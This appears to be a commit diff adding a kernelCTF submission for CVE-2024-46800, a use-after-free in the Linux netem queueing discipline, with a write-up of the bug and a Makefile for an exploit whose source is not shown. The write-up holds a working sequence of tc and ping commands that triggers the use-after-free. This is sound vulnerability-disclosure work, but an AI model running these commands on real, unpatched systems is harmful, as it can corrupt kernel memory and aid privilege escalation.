Add kernelCTF CVE-2024-46800_lts_cos_mitigation

pocs/linux/kernelctf/CVE-2024-46800_lts_cos_mitigation/docs/vulnerability.md

@@ -0,0 +1,22 @@
+A vulnerability in the traffic control subsystem's netem qdisc (`CONFIG_NET_SCH_NETEM ` in the kernel config) can lead to a use-after-free. If a netem qdisc has a child qdisc, `netem_dequeue()` will attempt to enqueue a packet to it (for every other qdisc type this happens during enqueue; netem does it this way to allow a per packet delay). If this `qdisc_enqueue()` call returns`__NETEM_XMIT_STOLEN`, the packet will be dropped but the parent qdisc's `q.qlen` will not be updated. Then `qlen_notify()` may be skipped on the parent during destruction, leaving a dangling pointer for some classful qdiscs like DRR.
+
+The bug was introduced by `50612537e9ab ("netem: fix classful handling")` and fixed by `3b3a2a9c6349 ("sch/netem: fix use after free in netem_dequeue ")`. It affected kernel versions `3.3-6.11`.
+
+The vulnerability requires `CAP_NET_ADMIN` and can therefore only be exploited for privilege escalation from a user namespace. The following commands will trigger it and cause a use-after-free:
+
+```
+ip link add type dummy
+ip link set lo up
+ip link set dummy0 up
+tc qdisc add dev lo parent root handle 1: drr
+tc filter add dev lo parent 1: basic classid 1:1
+tc class add dev lo classid 1:1 drr
+tc qdisc add dev lo parent 1:1 handle 2: netem
+tc qdisc add dev lo parent 2: handle 3: drr
+tc filter add dev lo parent 3: basic classid 3:1 action mirred egress redirect dev dummy0
+tc class add dev lo classid 3:1 drr
+ping -c1 -W0.01 localhost # Trigger bug
+tc class del dev lo classid 1:1
+tc class add dev lo classid 1:1 drr
+ping -c1 -W0.01 localhost # UaF
+```

pocs/linux/kernelctf/CVE-2024-46800_lts_cos_mitigation/exploit/cos-109-17800.309.7/Makefile

@@ -0,0 +1,7 @@
+CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static -D COS
+
+exploit: exploit.c
+	gcc $(CFLAGS) -o $@ $<
+
+run:
+	./exploit